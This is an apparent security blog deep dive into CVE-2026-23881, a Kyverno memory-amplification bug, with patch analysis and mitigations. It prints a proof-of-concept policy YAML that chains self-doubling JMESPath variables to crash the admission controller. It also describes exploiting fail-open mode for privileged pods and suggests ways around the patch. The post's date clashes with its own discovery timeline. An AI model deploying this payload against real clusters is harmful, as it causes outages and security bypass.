CVE-2026-23881

The Policy That Ate the Cluster: Deep Dive into CVE-2026-23881

Alon Barad
Alon Barad
Software Engineer

Jan 27, 2026·7 min read·3 visits

Executive Summary (TL;DR)

Kyverno, the Kubernetes policy engine, failed to cap the memory usage of policy context variables. By chaining JMESPath variable definitions that reference themselves, an attacker can turn a few kilobytes of policy YAML into gigabytes of RAM usage. This OOM-kills the Kyverno controller, causing a Denial of Service. If Kyverno is configured to 'Fail-Open', security checks are bypassed. If 'Fail-Closed', the cluster becomes immutable. Patched in 1.15.3 and 1.16.3.

A logic flaw in Kyverno's variable context handling allows for exponential memory amplification (a 'Billion Laughs' style attack), enabling attackers to crash the admission controller and either bypass security policies or deadlock the cluster.

The Hook: Who Watches the Watcher?

Kubernetes is a beast. To tame it, we use admission controllers—bouncers at the API server door that check your ID and dress code before letting you in. Kyverno is one of the most popular bouncers in town. It lets you define policies like "All pods must have resource limits" or "No one runs as root." To make these policies flexible, Kyverno allows for context variables—little scratchpads where you can fetch data (like ConfigMaps) or manipulate strings before making a decision.

But here's the thing about scratchpads: if you don't limit how much someone can write on them, they're going to write until they run out of paper, or in this case, until the server runs out of RAM. CVE-2026-23881 is a classic resource exhaustion bug, but it's not caused by sending a massive payload over the wire. It's caused by sending a tiny payload that Kyverno politely agrees to turn into a massive one.

This is the logical equivalent of asking a bartender for a beer, then asking for another beer for every beer currently on the bar, recursively. Pretty soon, the bar collapses, the bartender is crushed, and nobody gets a drink. In Kubernetes terms: the admission controller crashes, and your cluster is left either undefended or completely locked down.

The Flaw: Exponential Amplification

The vulnerability lies in the pkg/engine/context component of Kyverno. When a policy is evaluated, Kyverno builds a JSON context object. This object holds variables defined in the policy. The engine processes these variables sequentially. Variable A is computed, then Variable B (which can reference A), and so on.

The developers fell into a classic trap: assuming linear resource consumption. They didn't anticipate that a user might define a variable that is a concatenation of previous variables doubled. By using JMESPath functions like join(), an attacker can take a string S, and define a new variable V1 as S + S. Then V2 as V1 + V1. This is $O(2^n)$ growth.

Mathematically, it looks like this:

  1. Layer 0: 1KB string.
  2. Layer 1: 2KB (L0 + L0).
  3. Layer 2: 4KB (L1 + L1). ...
  4. Layer 18: ~256MB.

Kyverno had no global tracker for the total size of this context. It would happily allocate Go objects for each step until the process hit the container's memory limit (OOM). Because this happens during admission review, it blocks the API server's request until the timeout fires or the pod dies. It is effectively the "Billion Laughs" XML bomb attack, reincarnated in modern cloud-native YAML.

The Code: The Smoking Gun

Let's look at why this happened. In the vulnerable versions, the context handling was essentially a free-for-all map assignment. There was no cumulative accounting.

Here is the logic pre-patch (simplified for clarity):

// Vulnerable Logic
func (c *Context) AddContextEntry(name string, data interface{}) {
    // Just throw it in the map. Memory is free, right?
    c.jsonContext[name] = data
}

The fix, introduced in commit 7a651be3a8c78dcabfbf4178b8d89026bf3b850f, introduced a maxContextSize budget. Now, every time you try to add a variable, the engine checks if you can afford it.

// Patched Logic
func (c *Context) AddContextEntry(name string, data interface{}) error {
    // calculate size of new data
    size := getSize(data)
    
    // check budget
    if c.currentSize + size > c.maxContextSize {
        return fmt.Errorf("context size limit exceeded: %d > %d", 
            c.currentSize + size, c.maxContextSize)
    }
    
    c.currentSize += size
    c.jsonContext[name] = data
    return nil
}

> [!NOTE] > The fix isn't perfect. Calculating the size of a Go interface{} is tricky. The patch often estimates size based on the raw JSON bytes, but the in-memory representation of a map in Go is significantly larger (pointers, overhead). A 2MB limit might still result in 10-20MB of actual heap usage, but it effectively stops the exponential growth to Infinity.

The Exploit: Building the Memory Bomb

Exploiting this requires permission to create a Policy or ClusterPolicy. This is usually restricted to admins, but in multi-tenant clusters or GitOps workflows, a developer might have rights to push policies to their namespace.

We don't need fancy C2 servers. We just need a recursive JMESPath loop. Here is the attack chain:

  1. Seed: Create a random string of 1KB.
  2. Amplify: Create 18 layers of variables, each joining the previous layer to itself.
  3. Trigger: Send a request that matches the policy (e.g., creating a ConfigMap).
context:
  - name: l0
    variable:
      jmesPath: random('[a-zA-Z0-9]{1000}') # 1KB
  - name: l1
    variable:
      jmesPath: join('', [l0, l0]) # 2KB
  # ... repeat ...
  - name: l18
    variable:
      jmesPath: join('', [l17, l17]) # 256MB

When the admission controller processes the l18 variable, it tries to allocate a contiguous 256MB string. If that passes, l19 would need 512MB. The Go Garbage Collector panics, the kernel invokes the OOM Killer, and the pod dies instantly.

The Impact: Fail Open or Fail Closed?

Why is this a High severity and not Critical? Because it requires policy creation rights. However, the impact of a successful exploit is devastating for cluster stability.

Scenario A: failurePolicy: Ignore (The Default) If Kyverno is configured to ignore failures when it times out or crashes, the Admission Controller effectively vanishes. The bouncer is dead, and the door is wide open. An attacker can crash Kyverno and immediately deploy a privileged pod that mounts the host filesystem, which would normally be blocked by policy.

Scenario B: failurePolicy: Fail (The Secure Choice) If you configured Kyverno to be secure by default, crashing the controller creates a massive denial of service. Since the webhook fails, the API server rejects all requests that require validation. No new pods, no deployments, no config changes. The cluster is essentially read-only until Kyverno recovers (which it won't, if the malicious policy persists).

Furthermore, the Reports Controller also loads these policies to check background compliance. It will also crash, blinding the security team to the state of the cluster.

The Fix: Mitigation & Bypass Research

The remediation is straightforward: Upgrade to Kyverno 1.15.3 or 1.16.3. These versions introduce a hard cap on context size (default 2MiB).

However, for the paranoid security researchers among us, the patch analysis reveals some interesting edges:

  1. Monotonic Growth: The ReplaceContextEntry function increments the size tracker but doesn't decrement it when replacing an entry. This means a long-running policy evaluation that updates variables often could hit the limit artificially. This is a potential (though minor) DoS of legitimate policies.
  2. Unmarshaling Overhead: The limit is on the raw bytes. Go's JSON unmarshaler is memory-hungry. An attacker could craft a context that fits the 2MB limit but is structurally complex (deeply nested maps), causing the unmarshaler to allocate far more heap memory than the size tracker accounts for.

Immediate Mitigation: If you cannot upgrade immediately, use RBAC to strictly control who can create Policy and ClusterPolicy objects. Audit all existing policies for the usage of repeat, join, or recursive variable definitions.

Fix Analysis (2)

Technical Appendix

CVSS Score
7.7/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
EPSS Probability
0.20%
Top 100% most exploited

Affected Systems

Kyverno Admission ControllerKyverno Reports ControllerKubernetes Clusters using Kyverno

Affected Versions Detail

Product
Affected Versions
Fixed Version
Kyverno
Kyverno
< 1.15.31.15.3
Kyverno
Kyverno
>= 1.16.0, < 1.16.31.16.3
AttributeDetail
CWECWE-770 (Resource Allocation without Limits)
Attack VectorNetwork (via Kubernetes API)
CVSS v3.17.7 (High)
ImpactDenial of Service / Security Bypass
Exploit ComplexityLow (Requires Policy Creation Rights)
Componentpkg/engine/context
CWE-770
Allocation of Resources Without Limits or Throttling

Allocation of Resources Without Limits or Throttling

Vulnerability Timeline

Vulnerability Discovered
2026-02-10
Initial Fix Committed
2026-02-15
Patched Versions Released
2026-02-20

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.